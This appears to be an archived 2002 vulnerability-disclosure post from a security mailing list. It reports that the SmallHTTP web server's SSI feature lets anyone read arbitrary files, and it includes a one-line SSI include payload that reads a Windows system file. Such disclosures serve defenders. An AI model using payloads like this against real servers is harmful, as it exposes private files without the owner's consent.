Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: SmallHTTP smallest problemm

SmallHTTP smallest problemm

From: keks_revda <keks_revda_at_uraltc.ru>
Date: Fri, 1 Feb 2002 11:09:16 +0500

          . .,,. . ,,.
        , ,;'' ``',
       ; ,' "o,
       o .;jo,. .j `oo.
______ 8.y'_________ g'.o, __ o6?6eo,. _____`oeo_ keks_revda_at_uraltc.ru
       8#( .o"', 6i' . 8' . `9op________________________
       "s"? oQ., ]#; `?6oow?88ga ]i?8o8899oo89'
        4' P. "koo,.e?e, `Pe 8'"88' ?8P
         4 "o o `'o,. . .e8 U !8 7'
          ? `?o.,. e. .eP , 8 !`
          ; ... p ....,,,s'''""" ' `
________ . ___________ o _________________________ ` __ _______________

Small HTTP server have else one smallest problemm in SSI level.
Sever can get access to any file.
More then .. Server can send anything using SSI

<b> begin </b>
<!--#include virtual="c:/msdos.sys" -->
<b> end </b>

Checked with 3.02 version under 98.

(it's my 1st message to VulnDev)
mailto:keks_revda_at_uraltc.ru
Received on Feb 01 2002

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos